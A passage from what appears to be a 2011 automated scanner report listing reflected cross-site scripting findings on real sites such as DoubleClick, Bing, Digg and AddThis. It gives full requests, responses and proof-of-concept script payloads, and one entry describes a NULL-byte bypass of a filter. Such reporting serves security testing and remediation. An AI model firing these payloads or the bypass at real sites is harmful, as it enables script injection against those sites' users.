Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6746
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Apr 2011 14:27:30 GMT
Expires: Sat, 23 Apr 2011 14:27:30 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=2d0ca"-alert(1)-"88694a35b67http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://deals.t-mobi
...[SNIP]...

2.16. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb657"-alert(1)-"f4d7486d038 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!cb657"-alert(1)-"f4d7486d038&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:26:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6746

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
_Spring_Largest4GNetwork_7999_Static.jpg";
var minV = 8;
var FWH = ' width="300" height="600" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!cb657"-alert(1)-"f4d7486d038&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B6249724
...[SNIP]...

2.17. http://ad.doubleclick.net/adj/iblocal.mediageneral.wspa/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.mediageneral.wspa/index

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef65d'-alert(1)-'8220c360d70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.mediageneral.wspa/indexef65d'-alert(1)-'8220c360d70;kw=containerlinkswelike;pos=1;sz=253x300;ord=219492970500141.38? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 24 Apr 2011 03:12:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1313

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.mediageneral.wspa/adj/iblocal.mediageneral.wspa/indexef65d'-alert(1)-'8220c360d70;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=3994457?">
...[SNIP]...

2.18. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 25dfa<img%20src%3da%20onerror%3dalert(1)>af66eeb7010 was submitted in the q parameter. This input was echoed as 25dfa<img src=a onerror=alert(1)>af66eeb7010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIH&q=25dfa<img%20src%3da%20onerror%3dalert(1)>af66eeb7010 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/hp?&MKT=en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _FS=mkt=en-US; _HOP=; _UR=HP=; MUID=5C4107AD436041918F34CEDC2D53EB3B; OrigMUID=5C4107AD436041918F34CEDC2D53EB3B%2c984596214ec74e1e88afb2386c4713a4; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; _SS=SID=9E8D54D7F0934D288FF126B397747EB3&CW=1074&CH=899

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 48a811b5974c4e5fb455d3f575b5b699
Date: Sat, 23 Apr 2011 13:44:51 GMT
Connection: close

{"AS":{"Query":"25dfa<img src=a onerror=alert(1)>af66eeb7010","FullResults":1}}

2.19. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 6b952<script>alert(1)</script>065aa11fd08 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run6b952<script>alert(1)</script>065aa11fd08&1303613738787 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:17:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Tue 29-Jul-2008 03:17:38 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 248

COMSCORE.BMX.Buddy.run6b952<script>alert(1)</script>065aa11fd08({ "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' });

2.20. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d34bc<script>alert(1)</script>eafa3fbf5c1 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=0J2F1ltJ97i&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bd34bc<script>alert(1)</script>eafa3fbf5c1 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/mobile/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Sat, 23 Apr 2011 14:19:49 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "f6232c94aac0820d1ba4195e36fdf7d577dab912"
Content-Length: 174
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3E0J2F1ltJ97i%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html; expires=Sun, 22 Apr 2012 14:19:48 GMT; Path=/
Set-Cookie: uid=52fb29c2-ec6a-4a73-a324-965c7d956e8a; Domain=.meteorsolutions.com; expires=Sun, 22 Apr 2012 14:19:48 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "0J2F1ltJ97i", "uid": "52fb29c2\\x2Dec6a\\x2D4a73\\x2Da324\\x2D965c7d956e8a"}, 0);d34bc<script>alert(1)</script>eafa3fbf5c1

2.21. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f515"><script>alert(1)</script>482e6e08913 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_star-telegram_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html&ctxtCat=news&outputCharEnc=latin1&css_url=http://media.star-telegram.com/static/mi/yahoo/css/yahoo.css3f515"><script>alert(1)</script>482e6e08913&tg=1&du=1&cb=1303613697383&ctxtContent=%3Chead%3E%3Clink%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%20href%3D%22%2F%2Fs7.addthis.com%2Fstatic%2Fr07%2Fwidget57.css%22%20media%3D%22all%22%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Star%20Telegram'%20%0A%7D%3B%0A%0A%0Avar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0%3Afunction(n)%7Bvar%20c%3Ddocument.cookie%3Bvar%20v%3Dc.match(new%20RegExp('%3B%5B%20%5D*' HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:11:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpsjNxNHFxMXQ0cTS3dXJXM0%2bLSi4sTU1JNbEBACNDCzdzUxMXJ2MAF7dYLQ0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 21-Apr-2021 03:11:09 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4702


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://media.star-telegram.com/static/mi/yahoo/css/yahoo.css3f515"><script>alert(1)</script>482e6e08913" type="text/css">
...[SNIP]...

2.22. http://dailymail.subscribeonline.co.uk/subscriptions [offer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dailymail.subscribeonline.co.uk
Path:   /subscriptions

Issue detail

The value of the offer request parameter is copied into the name of an HTML tag. The payload 141d3><script>alert(1)</script>de459fc0b76 was submitted in the offer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscriptions?offer=%22/%3E%3Cscript%3Ealert('JavaScript%20causes%20cancer')%3C/script%3E%3Cbr141d3><script>alert(1)</script>de459fc0b76 HTTP/1.1
Host: dailymail.subscribeonline.co.uk
Proxy-Connection: keep-alive
Referer: http://www.reddit.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-Control: no-cache,no-store,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 24 Apr 2011 00:43:17 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Set-Cookie: JSESSIONID=DFFD78C04A4631CDE64847F6E49243F8; Path=/
Set-Cookie: X-Mapping-fhlhdljk=F82D3E18336D48EC9D738D060316B1BD; path=/
Content-Length: 21826


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta c
...[SNIP]...
<br141d3><script>alert(1)</script>de459fc0b76" />
...[SNIP]...

2.23. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ce19f"><script>alert(1)</script>ee3f151a8b3 was submitted in the REST URL parameter 1. This input was echoed as ce19f"><script>alert(1)</script>ee3f151a8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00ce19f"><script>alert(1)</script>ee3f151a8b3 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 14:22:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076166248%3A200; expires=Sun, 24-Apr-2011 14:22:55 GMT; path=/; domain=digg.com
Set-Cookie: d=b9ef59bd470f57a68514f0e5f542938cd8f24e133f5843e63d8fa3080b33ccd2; expires=Fri, 23-Apr-2021 00:30:35 GMT; path=/; domain=.digg.com
X-Digg-Time: D=486083 10.2.130.24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13888

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ce19f"><script>alert(1)</script>ee3f151a8b3.rss">
...[SNIP]...

2.24. http://ds.addthis.com/red/psi/sites/www.star-telegram.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.star-telegram.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 37473<script>alert(1)</script>bae200dcf22 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.star-telegram.com/p.json?callback=_ate.ad.hpr37473<script>alert(1)</script>bae200dcf22&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html&1wijfoh HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 03:12:26 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 03:12:26 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 24 Apr 2011 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 03:12:26 GMT
Connection: close

_ate.ad.hpr37473<script>alert(1)</script>bae200dcf22({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.25. http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.vidivodo.com
Path:   /379705/kemal-ataturk-ve-albert-einstein

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12ea"><script>alert(1)</script>52c39204099 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /379705/kemal-ataturk-ve-albert-einsteinb12ea"><script>alert(1)</script>52c39204099 HTTP/1.1
Host: en.vidivodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 14:24:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Set-Cookie: PHPSESSID=9jj957lta4lr6jqn3ni6to42i2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: langCookie=en; expires=Mon, 01-Aug-2011 14:24:54 GMT
Set-Cookie: usradult=0; expires=Mon, 01-Aug-2011 14:24:54 GMT; path=/
Set-Cookie: stvdrs=120104.23; expires=Sun, 24-Apr-2011 14:24:54 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-9
Content-Length: 63100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Video : kema
...[SNIP]...
<link rel="canonical" href="http://www.vidivodo.com/379705/kemal-ataturk-ve-albert-einsteinb12ea"><script>alert(1)</script>52c39204099" />
...[SNIP]...

2.26. http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.vidivodo.com
Path:   /379705/kemal-ataturk-ve-albert-einstein

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f156c"><script>alert(1)</script>d1a37a5a2a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /379705/kemal-ataturk-ve-albert-einstein?f156c"><script>alert(1)</script>d1a37a5a2a0=1 HTTP/1.1
Host: en.vidivodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 14:24:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Set-Cookie: PHPSESSID=1p2redb0cnng8357v4n4r6f3d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: langCookie=en; expires=Mon, 01-Aug-2011 14:24:50 GMT
Set-Cookie: usradult=0; expires=Mon, 01-Aug-2011 14:24:50 GMT; path=/
Set-Cookie: stvdrs=120104.23; expires=Sun, 24-Apr-2011 14:24:50 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-9
Content-Length: 63167


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Video : kema
...[SNIP]...
<link rel="canonical" href="http://www.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein?f156c"><script>alert(1)</script>d1a37a5a2a0=1" />
...[SNIP]...

2.27. http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetbox.msnbc.msn.com
Path:   /_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd71b"><script>alert(1)</script>c573188b1d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts?fd71b"><script>alert(1)</script>c573188b1d1=1 HTTP/1.1
Host: gadgetbox.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 23 Apr 2011 14:23:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89931

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Gadgetbox - Mini crossbow
...[SNIP]...
<input type="hidden" name="redirect" value="http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts?fd71b"><script>alert(1)</script>c573188b1d1=1" />
...[SNIP]...

2.28. http://gadgetbox.msnbc.msn.com/_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetbox.msnbc.msn.com
Path:   /_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9386e"><script>alert(1)</script>d85df39341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts?9386e"><script>alert(1)</script>d85df39341=1 HTTP/1.1
Host: gadgetbox.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
